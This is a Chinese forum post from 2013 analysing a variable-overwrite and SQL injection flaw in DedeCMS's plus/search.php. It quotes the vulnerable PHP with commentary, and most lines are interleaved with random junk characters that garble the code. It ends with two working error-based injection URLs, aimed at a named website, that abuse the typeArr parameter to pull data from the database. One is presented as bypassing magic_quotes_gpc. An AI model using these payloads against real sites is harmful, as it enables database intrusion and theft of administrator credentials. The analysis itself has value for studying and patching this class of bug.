微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
6 c7 T: q0 b/ ?% ]8 G作者: c4rp3nt3r@0x50sec.org
' W/ s( n% X' C; o1 QDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
7 [& O2 E p+ Y ?+ b8 O / c, E: F" I' K/ s8 ]# y
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
0 Y5 ]1 D0 U2 D) c
. s, f/ J# B' N, h' o- x/ M% f============' E Z+ J+ P& h& p7 z
5 X+ m' V! K$ X5 y7 r6 \& {
n3 u7 {& F' G$ O; o! hDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.# S! C, z8 P. E, y3 h6 e
4 k: L7 d2 U- S; ]6 yrequire_once(dirname(__FILE__).”/../include/common.inc.php”);
5 _& g8 ^8 `+ \7 Y- b! J N' jrequire_once(DEDEINC.”/arc.searchview.class.php”);
8 F. @3 ?) r2 Y 4 |) H5 E/ |1 f! f9 c6 I) `
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;6 Q" |6 @* F1 R7 z4 Y
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
4 R2 H) @ S8 i, v" K$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;$ _* U" J7 x1 C% M
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;% Z! @ k& D1 i- ]$ q
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
; o7 j2 ^! N5 j: l6 |7 N O9 B' ~ " _& W: X V6 O+ g
if(!isset($orderby)) $orderby=”;
N, X/ ^2 |1 @, i/ q- jelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
, X( D! U8 ]& b% P$ a 3 G% W) B" Q* C8 a4 d4 P' c6 P+ Q6 }
# n0 ]9 k" l* a4 m1 C* Eif(!isset($searchtype)) $searchtype = ‘titlekeyword’;
/ @- q& {* c5 C- D6 ^) ]4 jelse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
& C; C: e6 A! F# b7 E4 n: L
1 R, a" p7 |2 t0 D" Zif(!isset($keyword)){
1 f4 V# [& [" R* k) d/ {" N if(!isset($q)) $q = ”;- ~7 W) G! n2 p3 p% h1 s9 {0 J; _" U
$keyword=$q;
& i! q; h7 V/ v a2 g+ o' I}
( z# k, q7 M2 G3 I& |! Y
! [3 c6 R; {" Q& j! }$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
$ C0 \+ l8 [; U0 R9 L* D
0 T# Q* m0 x W( V+ z//查找栏目信息8 X' A; M, Z$ {' @ G( h$ Q
if(empty($typeid))* Z K' N) P& y, X; r
{
6 [) _( }, B- \* ?) w0 H $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
& d& C% H9 d2 Y# k* a& R5 I3 B if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )& ~' j* G) V5 z% M7 S0 M/ z2 n
{9 Q7 I" E7 H' H! ^0 X/ ?
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
$ A; q' |" x! W* x. J( ]' x7 H fwrite($fp, “<”.”?php\r\n”);
, f8 k7 Y+ u4 U4 @1 @ $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
) z9 s, @& ~4 ~* z; a $dsql->Execute();
9 g' x+ T/ e3 A9 Q7 a& g while($row = $dsql->GetArray())
) Y6 {- Q- j1 s) L( X {/ r; K; K4 s" I' O5 V U7 Y5 s
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
6 t4 M5 d+ r. g }
0 L1 |% a2 r6 }! C fwrite($fp, ‘?’.'>’);9 }2 ~7 [8 r6 Z/ L) g G; t5 A% H
fclose($fp);
- l: r" l9 |$ l }5 G$ c2 z% g' U0 o9 r
//引入栏目缓存并看关键字是否有相关栏目内容. F6 P& i4 H5 O- ?: |, f. h
require_once($typenameCacheFile);- F7 r' g0 |; N; m0 \1 A
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
( B+ }+ V* R% N! s2 M0 c2 b/ k; w//& s' F% Z) t: Z! M+ c2 e9 u
if(isset($typeArr) && is_array($typeArr))
9 ^0 Y( O. C( M {* X9 G7 i, g+ D& I# ^3 D4 W
foreach($typeArr as $id=>$typename)
3 z5 K: y1 q* f4 u# @ {
w" a1 Z, E7 @! M7 J6 u% D5 {. b$ U
) t" v2 n" i& f8 @& ?. s5 E# I5 Q8 O <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过* X9 I8 t# i; U4 S' ?
if($keyword != $keywordn)6 q- Z" x4 C2 u9 q' n/ g% U' W
{7 D) ~ G. K. Z z+ S8 v; P
$keyword = $keywordn;
4 e/ K* E9 G- z& ?1 o <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
8 f" Z% M. q, J$ q% b! y break;! k$ z& D) d" Q; }1 j* A/ h3 R
}
6 c4 e$ f* _3 F: h1 n( m6 ` }1 _3 y3 y, B: H# T0 e
}% z5 Y/ a! X9 X( R! s) ^ k
}% B/ R" G; O0 Z f
然后plus/search.php文件下面定义了一个 Search类的对象 .
' ~' H+ X7 {! Z7 @, D; r/ ~在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.4 e# c2 y; l2 T
$this->TypeLink = new TypeLink($typeid);
: N2 V( |1 @$ {% ?. U# W
4 U( C% O% s; r7 X) Y3 m; S+ `7 E8 }- Z+ [TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.* }+ E3 t5 r% e! ~/ J
5 Y0 e9 `( ^/ W& q+ C7 }/ v( d
class TypeLink
( X2 B7 w; m/ H$ |" q{4 a4 Q( U' V# r; l
var $typeDir;( h( f) }$ J; P( J/ }/ ^% S: M
var $dsql;
5 v6 v5 ^. C: P var $TypeID;
; P9 S2 A& P( \ Q0 L7 _0 h6 y: A# Q: l var $baseDir;- o, Y7 q! Z9 ~/ U. ]
var $modDir;8 e2 v8 w# N7 ~" b. o
var $indexUrl;
7 b, }$ j$ `2 A5 }% F# u( { var $indexName;3 U/ u+ y `/ l3 Q3 w/ [ m1 v
var $TypeInfos;
- q# n6 N% _2 x V1 V8 j0 r var $SplitSymbol;
: v# D0 R+ h9 j, g var $valuePosition;
! u( F! }; b: e5 @: u' A var $valuePositionName;6 x% L1 F6 I$ Z2 r/ T- A
var $OptionArrayList;//构造函数///////
$ C% H- ~( e/ P8 W* A5 ^! F //php5构造函数0 X! j, w' |" E" |/ U
function __construct($typeid)
" D# F+ A) ~6 r' k- W {
3 a6 o) F u8 `( g1 K' G $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
; W1 o9 J4 a; E! Y6 z! U" Z) A7 { $this->indexName = $GLOBALS['cfg_indexname'];2 |0 k% m* h( ?( ^8 ]3 \) N/ I
$this->baseDir = $GLOBALS['cfg_basedir'];
5 v' x+ [! l1 F! E L3 Z2 w $this->modDir = $GLOBALS['cfg_templets_dir'];
1 o1 \# U- A, o$ w* r: K. P $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
. y+ d2 f3 a$ {. E' H, | $this->dsql = $GLOBALS['dsql'];
9 A \) l; e, M( [. @# w $this->TypeID = $typeid;1 k5 O& T9 H) m" J
$this->valuePosition = ”;
, q0 A2 C |* F" ~. Z $this->valuePositionName = ”;' u' X7 y- D' J8 W+ T( ^
$this->typeDir = ”;( |, R! i m1 [1 b- S" e
$this->OptionArrayList = ”;
9 X8 F& `$ p" Q2 M3 O9 I8 c
7 M9 r1 U( t. e U$ T" O //载入类目信息
: H {0 u/ [7 s. `/ m: a( Y
/ u- `4 O& i& V5 j: z+ q3 L5 A/ @ <font color=”Red”>$query = “SELECT tp.*,ch.typename as
5 W! J- ?/ t$ l" u! z& T* q4 z+ Mctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join; x2 ]/ C9 Y6 I
`#@__channeltype` ch
- ]4 d9 @( n. D) c# V8 S1 l2 ~ on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿 W. u" Y8 }+ w
) H/ |. ?/ \; z) [) ^ if($typeid > 0)
( w9 s3 l' W2 o' |0 K- l/ E; r- R {
" v4 i' @5 B& L' `9 M1 N& v $this->TypeInfos = $this->dsql->GetOne($query);
! K; |( o5 L9 {! }1 S2 g9 A5 S利用代码一 需要 即使magic_quotes_gpc = Off, ], q" X: R# K3 F% z
) \" S4 l" I( ]$ I, cwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
! d) U- T, p: u. {! N9 ~# I0 A
6 I. @4 l7 D: ?8 b6 G3 h' v这只是其中一个利用代码… Search 类的构造函数再往下
" B7 d; c& O& V6 J1 W! x. w+ x8 V* }: ^ ) E4 U2 L) T! y
……省略
# I" E' c& n: q: W$ K" p$this->TypeID = $typeid; Q/ ~2 e2 P* {7 C* K4 K+ y
……省略/ _! ?8 [' n7 u7 D2 v
if($this->TypeID==”0″){
4 W$ z, @) X1 r# I/ G# ^ $this->ChannelTypeid=1;
, g. g) \/ Q1 s/ N. I' K9 _/ I6 X }else{
8 S8 l& e& d2 q; g: }' R% ^ $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
3 c, G" A% e% F5 [0 m0 o/ H# G//现在不鸡肋了吧亲…5 n8 J0 Q9 G$ H! g1 W! J+ Q& B
$this->ChannelTypeid=$row['channeltype'];: b8 o- L& E. v) y2 F6 B
. T2 W! Z: P0 M9 o& ^& ^ F
}
7 {2 a4 F6 q2 P1 Y$ ?0 o9 I" F利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
$ t o8 S* j* D7 ?! d7 x1 x
3 c0 m. w r" Y$ S; z3 awww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title2 T% w' y; S8 G4 l5 E9 b
3 ]& x8 e! F; J0 a6 ]2 ?如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站: m* M& @ t `5 }8 e# X
|
发表于 2013-1-19 08:18:56
收藏
支持
反对